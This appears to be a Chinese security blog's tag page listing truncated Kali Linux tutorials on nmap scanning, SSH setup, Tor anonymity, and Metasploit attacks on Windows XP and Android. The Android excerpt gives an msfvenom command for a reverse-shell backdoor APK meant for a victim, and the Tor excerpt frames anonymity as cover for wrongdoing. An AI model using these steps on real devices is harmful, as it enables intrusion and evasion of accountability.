包含标签 系统安全 articles

Kali Linux:使用nmap扫描主机

nmap-Network Mapper,是著名的网络扫描和嗅探工具包。他同样支持Windows和OS X。 扫描开放端口和判断操作系统类型 先让我们ping一段地址范围,找到启动的主机: # nmap -sP 159.203.205.0-100 使用SYN扫描探测操作系统类型: # nmap -sS 159.203.205.61 -O 扫描开放端口: # nmap -sV 159.203.205.61 -A 扫描web服务器的网站目录 #……

Continue reading

Kali Linux安装SSH Server

Kali Linux默认并没有安装SSH服务,为了实现远程登录Kali Linux,我们需要安装SSH服务。 安装 OpenSSH Server # apt-get install openssh-server 配置SSH服务开机启动 # update-rc.d -f ssh remove # update-rc.d -f ssh defaults # update-rc.d -f ssh enable 2 3 4 5 更改默认的SSH密钥 # cd /etc/ssh # mkdir ssh_key_backup # mv ssh_host_* ssh_key_backup 创建新密钥: # dpkg-reconfigure openssh-server 允许root用户使用ssh远程登录 默认下,不允许……

Continue reading

使用tor实现匿名扫描/SSH登录

你要做坏事时,最先应该想到匿名。扫描网站/主机,或利用漏洞;甚至在大天朝发帖都有风险,为了防止半夜鬼敲门,我们可以使用tor实现匿名。 如果你不知道tor是什么,看:https://zh.wikipedia.org/wiki/Tor ; https://program-think.blogspot.com/2013/11/tor-faq.html 图示: 在天朝也许要多加一层: 优点: 首先有了一个……

Continue reading

使用Metasploit收集邮箱信息

Metasploit提供了很多辅助的模块,非常实用。今天介绍一个叫search_email_collector的模块,它的功能是查找搜索引擎(google、bing、yahoo),收集和某个域名有关的邮箱地址。 使用步骤: 启动msfconsole: # service postgresql start # msfconsole 搜索模块: msf > search gather auxiliary 找……

Continue reading

安装使用lynis扫描Linux的安全漏洞

Lynis是Linux平台上的一款安全漏洞扫描工具。它可以扫描系统的安全漏洞、收集系统信息、安装的软件信息、配置问题、没有设置密码的用户和防火墙等等。 Lynis是流行可靠的安全扫描工具。 前不久,Lynis更新了版本,Lynis发布了2.2.0。在这个版本上增加了新的特性和一些小的……

Continue reading

Metasploit的基本使用

Metasploit可以在Linux、Windows和Mac OS X系统上运行。我假设你已安装了Metasploit,或者你使用的系统是Kali Linux。它有命令行接口也有GUI接口。 我使用的系统是Kali Linux,本文以这个系统为例。 图形用户界面接口:Armitage 命令行接口……

Continue reading

演示使用Metasploit入侵Windows

我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。 本文演示怎么使用Metasploit入侵windows xp sp3。 启动msfconsole: # msfconsole 选择一个漏洞: msf > search platform: windows xp sp3 explo……

Continue reading

演示使用Metasploit入侵Android

文本演示怎么使用Kali Linux入侵Android手机。 Kali Linux IP地址:192.168.0.112;接收连接的端口:443。 同一局域网内android手机一部(android 5.1) 创建一个后门程序 在终端中执行: # msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=443 > my_backdoor.apk 这个后门程序(APK)是发送给受害者的;要把上面命令的IP……

Continue reading